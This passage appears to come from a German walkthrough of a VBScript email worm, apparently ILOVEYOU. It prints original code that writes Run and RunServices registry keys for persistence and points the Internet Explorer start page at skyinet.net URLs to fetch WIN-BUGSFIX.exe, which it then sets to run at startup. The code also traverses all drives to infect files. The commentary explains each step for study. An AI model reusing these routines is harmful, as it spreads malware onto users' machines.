Weiter im Quelltext...
<![CDATA[
sub regruns()
On Error Resume Next
Dim num,downread
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\
Internet Explorer\Download Directory")
if (downread="") then
downread="c:"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 <a href="/v3/php_jobs/glossar.php3?id=1336" class="glossar">*</a> Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\
Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjk
xcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/
WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\
Start Page","http://www.skyinet.net/~angelcat/skladjflfd
jghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/
WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\
Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpG
qaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\
Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNB
mnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmz
nxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\]]><![CDATA[CurrentVersion\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\]]><![CDATA[Internet Explorer\Main\Start Page","about:blank"
end if
end sub]]>
Die Funktion regruns() tut verschiedene Dinge in der
Registry . Zunächst legt Sie unter
'CurrentVersion/Run' zwei Schlüssel an: Beide zeigen auf die zuvor angelegten Kopien des
Virus (unter den Namen MSKernel und Win32DLL) - Einträge unter 'Run' werden beim Start
von
Windows ausgeführt - d.h., beim nächsten Systemstart würde der
Virus erneut gestartet
und von vorne loslegen.
Danach ermittelt der Virus das 'Download'-Verzeichnis - das ist das Verzeichnis, in dem
der Internet Explorer heruntergeladenen Dateien speichert. Ist kein solches Verzeichnis
festgelegt, so wird einfach die 'C:' Platte hergenommen.
Danach wird - basierend auf einem Zufallswert - die Startseite des Internet Explorers verändert, und
zwar so, das sie auf einen
Server von skyinet.net zeigt, von wo ursprünglich noch eine weitere Datei
heruntergeladen wird sobald der Explorer gestartet wird: Der Betreiber von SkyInet hat diese mitlerweile
vom Netz genommen. Würde diese herunterzuladene Datei existieren (das waere ab dem nächsten Durchlauf
des Programmes nach dem Start des Internet Explorers der Fall), so würde auch dieses Programm so in
der Registry eingetragen, das es beim nächsten Start von Windows ausgeführt würde: Mehr Möglichkeiten
mit denen der Virus Schaden anrichten kann.
<![CDATA[
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"")
end if
Next
listadriv = s
end sub
]]>
Diese Funktion listet einfach nur alle Laufwerke auf und ruft dann die
Funktion 'Folderlist' auf, die ihrerseits alle Ordner (Folder) auf
den Laufwerken abarbeitet.
<![CDATA[
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
]]>
Für jeden Folder (Ordner) wird dann die Funktion 'InfectFiles' aufgerufen - diese Funktion
berarbeitet einzelne Dateien in den Ordnern, was genau sie tut ist weiter unten beschrieben.
